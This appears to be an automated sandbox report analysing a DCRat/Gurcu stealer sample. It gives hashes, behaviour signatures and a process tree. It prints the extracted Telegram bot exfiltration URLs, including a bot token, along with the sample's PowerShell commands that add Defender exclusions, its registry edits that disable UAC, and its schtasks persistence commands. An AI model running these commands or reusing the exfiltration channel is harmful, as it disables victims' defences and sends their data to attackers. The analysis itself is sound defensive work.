dcrat | d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
04-07-2024 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Njrat.exe
Size

3.1MB
MD5

7bbb27a3b9ace5f7d403ba8d6ef58d28
SHA1

5effbe830a93770824ee60f65eac790dda1ee807
SHA256

d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c
SHA512

32774b5efc9a4c771ed74cb59d6e4221d4cfb92e05d18cf9d3ad53b957005cce84892ef9e563d2c4c932127dac595394e23d8bc3e2a6ab3a654acef5e24e0327
SSDEEP

49152:VbA3GVZoGDweuD4gWA7evLcjM3wwwZHFXIJ5nDWhVGUwwB3SNZts8zOqhsg:VbZDweuD4rcH9Vl65Dac7ssNj

Score

10^/10

dcrat gurcu discovery evasion execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendPhoto?chat_id=https://t.me/Eblan30000000_bot&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%E2%80%A2%20Comment%3A%20njRAT%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20TMUACBLB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CAdobe%5CAcrobat%20Reader%20DC%5CReader%5CUIThemes%5CbackgroundTaskHost.ex

https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendDocument?chat_id=https://t.me/Eblan30000000_bot&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.750307

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5104	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	972	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4908	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4388	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3424	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3088	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	440	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3360	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3376	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3516	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1340	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2364	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5092	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3252	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1128	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4444	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	404	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1336	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3420	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4712	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4644	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	4812	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	4812	schtasks.exe	90

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023413-10.dat	dcrat
behavioral2/memory/5112-13-0x00000000001F0000-0x00000000004D2000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3288	powershell.exe
2104	powershell.exe
1920	powershell.exe
1276	powershell.exe
968	powershell.exe
2428	powershell.exe
528	powershell.exe
3728	powershell.exe
4068	powershell.exe
4252	powershell.exe
3964	powershell.exe
4080	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	Njrat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	Hyperblockport.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	backgroundTaskHost.exe

Executes dropped EXE 2 IoCs

pid	Process
5112	Hyperblockport.exe
3684	backgroundTaskHost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ipinfo.io
31	ipinfo.io

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Defender\de-DE\winlogon.exe	Hyperblockport.exe
File created	C:\Program Files\Windows Defender\de-DE\cc11b995f2a76d	Hyperblockport.exe
File created	C:\Program Files\Common Files\DESIGNER\5940a34987c991	Hyperblockport.exe
File created	C:\Program Files (x86)\Windows Mail\OfficeClickToRun.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\sihost.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\66fc9ff0ee96c2	Hyperblockport.exe
File created	C:\Program Files (x86)\Internet Explorer\de-DE\66fc9ff0ee96c2	Hyperblockport.exe
File created	C:\Program Files\Common Files\DESIGNER\dllhost.exe	Hyperblockport.exe
File created	C:\Program Files\Google\Chrome\RuntimeBroker.exe	Hyperblockport.exe
File created	C:\Program Files\Google\Chrome\9e8d7a4ca61bd9	Hyperblockport.exe
File created	C:\Program Files (x86)\Internet Explorer\de-DE\sihost.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Windows Mail\e6c9b481da804f	Hyperblockport.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\eddb19405b7ce1	Hyperblockport.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Web\Screen\wininit.exe	Hyperblockport.exe
File created	C:\Windows\Web\Screen\56085415360792	Hyperblockport.exe
File created	C:\Windows\appcompat\encapsulation\unsecapp.exe	Hyperblockport.exe
File created	C:\Windows\appcompat\encapsulation\29c1c3cc0f7685	Hyperblockport.exe
File created	C:\Windows\Fonts\backgroundTaskHost.exe	Hyperblockport.exe
File created	C:\Windows\Offline Web Pages\cc11b995f2a76d	Hyperblockport.exe
File created	C:\Windows\Fonts\eddb19405b7ce1	Hyperblockport.exe
File created	C:\Windows\it-IT\explorer.exe	Hyperblockport.exe
File created	C:\Windows\it-IT\7a0fd90576e088	Hyperblockport.exe
File created	C:\Windows\Offline Web Pages\winlogon.exe	Hyperblockport.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	Hyperblockport.exe
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	Njrat.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1084	schtasks.exe
3760	schtasks.exe
3788	schtasks.exe
4712	schtasks.exe
4152	schtasks.exe
4264	schtasks.exe
840	schtasks.exe
4784	schtasks.exe
4388	schtasks.exe
3516	schtasks.exe
3664	schtasks.exe
2248	schtasks.exe
1584	schtasks.exe
2696	schtasks.exe
1940	schtasks.exe
1804	schtasks.exe
3048	schtasks.exe
440	schtasks.exe
3252	schtasks.exe
4184	schtasks.exe
4244	schtasks.exe
5092	schtasks.exe
2604	schtasks.exe
624	schtasks.exe
4908	schtasks.exe
2508	schtasks.exe
3420	schtasks.exe
4776	schtasks.exe
2364	schtasks.exe
972	schtasks.exe
2156	schtasks.exe
3396	schtasks.exe
5104	schtasks.exe
2884	schtasks.exe
1340	schtasks.exe
4060	schtasks.exe
3756	schtasks.exe
1756	schtasks.exe
4444	schtasks.exe
1336	schtasks.exe
2896	schtasks.exe
1812	schtasks.exe
4880	schtasks.exe
3192	schtasks.exe
3088	schtasks.exe
4644	schtasks.exe
3424	schtasks.exe
3360	schtasks.exe
404	schtasks.exe
4496	schtasks.exe
1616	schtasks.exe
3376	schtasks.exe
4392	schtasks.exe
1128	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
5112	Hyperblockport.exe
2104	powershell.exe
2104	powershell.exe
4080	powershell.exe
4080	powershell.exe
3728	powershell.exe
3728	powershell.exe
2428	powershell.exe
2428	powershell.exe
1920	powershell.exe
1920	powershell.exe
528	powershell.exe
528	powershell.exe
1276	powershell.exe
1276	powershell.exe
968	powershell.exe
968	powershell.exe
4068	powershell.exe
4068	powershell.exe
4252	powershell.exe
4252	powershell.exe
3964	powershell.exe
3964	powershell.exe
3288	powershell.exe
3288	powershell.exe
4068	powershell.exe
968	powershell.exe
2428	powershell.exe
3964	powershell.exe
4080	powershell.exe
2104	powershell.exe
3728	powershell.exe
1920	powershell.exe
4252	powershell.exe
528	powershell.exe
1276	powershell.exe
3288	powershell.exe
3684	backgroundTaskHost.exe
3684	backgroundTaskHost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	5112	Hyperblockport.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeDebugPrivilege	3684	backgroundTaskHost.exe
Token: SeBackupPrivilege	5036	vssvc.exe
Token: SeRestorePrivilege	5036	vssvc.exe
Token: SeAuditPrivilege	5036	vssvc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3684	backgroundTaskHost.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 2692	1468	Njrat.exe	82
PID 1468 wrote to memory of 2692	1468	Njrat.exe	82
PID 1468 wrote to memory of 2692	1468	Njrat.exe	82
PID 2692 wrote to memory of 5072	2692	WScript.exe	87
PID 2692 wrote to memory of 5072	2692	WScript.exe	87
PID 2692 wrote to memory of 5072	2692	WScript.exe	87
PID 5072 wrote to memory of 5112	5072	cmd.exe	89
PID 5072 wrote to memory of 5112	5072	cmd.exe	89
PID 5112 wrote to memory of 3288	5112	Hyperblockport.exe	145
PID 5112 wrote to memory of 3288	5112	Hyperblockport.exe	145
PID 5112 wrote to memory of 2104	5112	Hyperblockport.exe	146
PID 5112 wrote to memory of 2104	5112	Hyperblockport.exe	146
PID 5112 wrote to memory of 3728	5112	Hyperblockport.exe	147
PID 5112 wrote to memory of 3728	5112	Hyperblockport.exe	147
PID 5112 wrote to memory of 4068	5112	Hyperblockport.exe	148
PID 5112 wrote to memory of 4068	5112	Hyperblockport.exe	148
PID 5112 wrote to memory of 4252	5112	Hyperblockport.exe	149
PID 5112 wrote to memory of 4252	5112	Hyperblockport.exe	149
PID 5112 wrote to memory of 3964	5112	Hyperblockport.exe	150
PID 5112 wrote to memory of 3964	5112	Hyperblockport.exe	150
PID 5112 wrote to memory of 4080	5112	Hyperblockport.exe	151
PID 5112 wrote to memory of 4080	5112	Hyperblockport.exe	151
PID 5112 wrote to memory of 968	5112	Hyperblockport.exe	152
PID 5112 wrote to memory of 968	5112	Hyperblockport.exe	152
PID 5112 wrote to memory of 1920	5112	Hyperblockport.exe	153
PID 5112 wrote to memory of 1920	5112	Hyperblockport.exe	153
PID 5112 wrote to memory of 2428	5112	Hyperblockport.exe	154
PID 5112 wrote to memory of 2428	5112	Hyperblockport.exe	154
PID 5112 wrote to memory of 528	5112	Hyperblockport.exe	155
PID 5112 wrote to memory of 528	5112	Hyperblockport.exe	155
PID 5112 wrote to memory of 1276	5112	Hyperblockport.exe	156
PID 5112 wrote to memory of 1276	5112	Hyperblockport.exe	156
PID 5112 wrote to memory of 2388	5112	Hyperblockport.exe	168
PID 5112 wrote to memory of 2388	5112	Hyperblockport.exe	168
PID 2388 wrote to memory of 4632	2388	cmd.exe	171
PID 2388 wrote to memory of 4632	2388	cmd.exe	171
PID 2388 wrote to memory of 3684	2388	cmd.exe	175
PID 2388 wrote to memory of 3684	2388	cmd.exe	175
PID 3684 wrote to memory of 1952	3684	backgroundTaskHost.exe	177
PID 3684 wrote to memory of 1952	3684	backgroundTaskHost.exe	177
PID 3684 wrote to memory of 5108	3684	backgroundTaskHost.exe	178
PID 3684 wrote to memory of 5108	3684	backgroundTaskHost.exe	178

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	backgroundTaskHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Njrat.exe
"C:\Users\Admin\AppData\Local\Temp\Njrat.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\containerperf\9nepdzd6Yg.vbe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\containerperf\MJF5L0LGrR45RopQV75MoqBbC.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\containerperf\Hyperblockport.exe
      "C:\containerperf\Hyperblockport.exe"
      4⤵
      UAC bypass
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:5112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ac6ml9BZWY.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2388
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:4632
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe"
        6⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:3684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a183acac-d55a-4a96-a49d-a1a2d33ee001.vbs"
        7⤵
        
        PID:1952
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d3d03293-f0f9-493a-a353-eea5dddc2483.vbs"
        7⤵
        
        PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:972

C:\Windows\system32\schtasks.exe
